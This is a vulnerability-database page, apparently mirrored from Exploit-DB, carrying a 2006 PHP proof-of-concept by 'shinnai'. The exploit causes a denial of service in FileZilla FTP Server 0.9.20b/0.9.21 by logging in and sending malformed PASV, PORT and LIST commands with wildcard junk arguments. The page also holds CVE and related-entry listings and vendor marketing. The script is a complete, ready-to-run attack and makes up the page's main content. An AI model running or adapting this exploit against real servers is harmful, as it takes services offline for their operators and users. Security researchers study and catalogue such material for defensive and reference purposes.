Lucene search
+L

FileZilla FTP Server 0.9.21 - 'LIST/NLST' Denial of Service

🗓️ 11 Dec 2006 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

FileZilla FTP Server 0.9.21 - 'LIST/NLST' Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
FileZilla FTP Server < 0.9.22 Multiple Remote DoS
12 Dec 200600:00
nessus
nessus
Tenable Nessus
FileZilla FTP Server < 0.9.22 Wildcard Handling Remote DoS
12 Dec 200600:00
nessus
circl
Circl
CVE-2006-6565
29 May 201815:50
circl
cve
CVE
CVE-2006-6564
15 Dec 200611:00
cve
cve
CVE
CVE-2006-6565
15 Dec 200611:00
cve
cvelist
Cvelist
CVE-2006-6564
15 Dec 200611:00
cvelist
cvelist
Cvelist
CVE-2006-6565
15 Dec 200611:00
cvelist
exploitdb
Exploit DB
FileZilla FTP Server 0.9.20b/0.9.21 - 'STOR' Denial of Service
9 Dec 200600:00
exploitdb
euvd
EUVD
EUVD-2006-6547
7 Oct 202500:30
euvd
metasploit
Metasploit
FileZilla FTP Server Malformed PORT Denial of Service
9 Jan 200905:33
metasploit
Rows per page
<?php

# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
# by shinnai
# mail: shinnai[at]autistici[dot[org]
# site: http://shinnai.altervista.org
#
# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
# and for code in php I never could write alone ;)
# This one works fine also with an user with only read and list permissions enabled
# you can change the LIST command also with NLST or NLST -al comamnds

# tested on Windows XP Professional SP2 all patched

error_reporting(E_ALL);

$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('127.0.0.1');

$user="test";
$pass="test";

$junk.="A*";

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
  echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
  echo "OK.\n";
}

$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
  echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
  echo "OK.\n";
}

$out=socket_read($socket, 240);
echo $out;

$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "LIST ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

socket_close($socket);

?>

# milw0rm.com [2006-12-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.71504
38